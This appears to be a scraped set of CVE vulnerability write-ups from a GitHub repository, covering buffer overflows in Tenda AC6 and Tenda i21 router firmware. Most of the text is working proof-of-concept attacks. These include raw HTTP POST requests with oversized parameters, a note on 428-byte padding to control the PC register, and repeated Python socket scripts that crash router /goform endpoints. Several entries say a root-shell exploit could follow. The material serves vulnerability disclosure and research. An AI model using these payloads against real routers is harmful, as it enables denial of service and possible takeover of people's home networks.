Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the addWifiMacFilter function.

CVE-2022-45643: CVE-vulns/addWifiMacFilter_deviceId.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceMac parameter in the addWifiMacFilter function.

CVE-2022-45645: CVE-vulns/addWifiMacFilter_derviceMac.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function.

CVE-2022-45648: CVE-vulns/formSetDeviceName.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk\_crypto parameter in the fromSetWirelessRepeat function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/WifiExtraSet page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/WifiExtraSet HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 247
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

CVE-2022-45659: CVE-vulns/fromSetWirelessRepeat.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetIpMacBind request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetIpMacBind page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetIpMacBind HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 453
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    bindnum=1&list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\n
    

Using A\*428 to padding, we can control PC register

CVE-2022-45657: CVE-vulns/fromSetIpMacBind.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setUplinkInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setUplinkInfo, pingHostIp1 is controlled by the user and will be spliced into auto\_ping\_ip by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'upLinkEn=true&pingHostIp1=' + p1

p3 \= b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44367: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/AddSysLogRule.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/AddSysLogRule, when the input op is add, you can input logip, logport, len, and finally these three will be spliced into mib\_value through sprintf. It is worth noting that these three do not check the size, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'op=add&logip=' + p1

p3 \= b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44362: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) has a stack overflow vulnerability via /goform/setSysPwd.

Permalink

Cannot retrieve contributors at this time

**Tenda i21 V1.0.0.14(4656) Dos vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSysPwd, when action is set to admin, the value of oldPwd will be base64 encoded and then passed to v3, and then v3 will be sent to encode\_pwd by strcpy. It is worth noting that the stack overflow vulnerability is caused by not checking the size.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'action=admin&oldPwd=' + p1

p3 \= b"POST /goform/setSysPwd" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

CVE-2022-44365: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setSnmpInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSnmpInfo, snmpEn is controlled by the user and will finally be spliced into parm by sprintf. It is worth noting that the stack overflow is caused by not checking the size

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'snmpEn=' + p1

p3 \= b"POST /goform/setSnmpInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44363: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setDiagnoseInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Heap overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setDiagnoseInfo, a value of 0x50 is created, which will use strcpy to give the value after cmd + 5 to the heap. It is worth noting that the size is not checked, resulting in a heap overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'cmd=' + p1

p3 \= b"POST /goform/setDiagnoseInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

Tag

#mac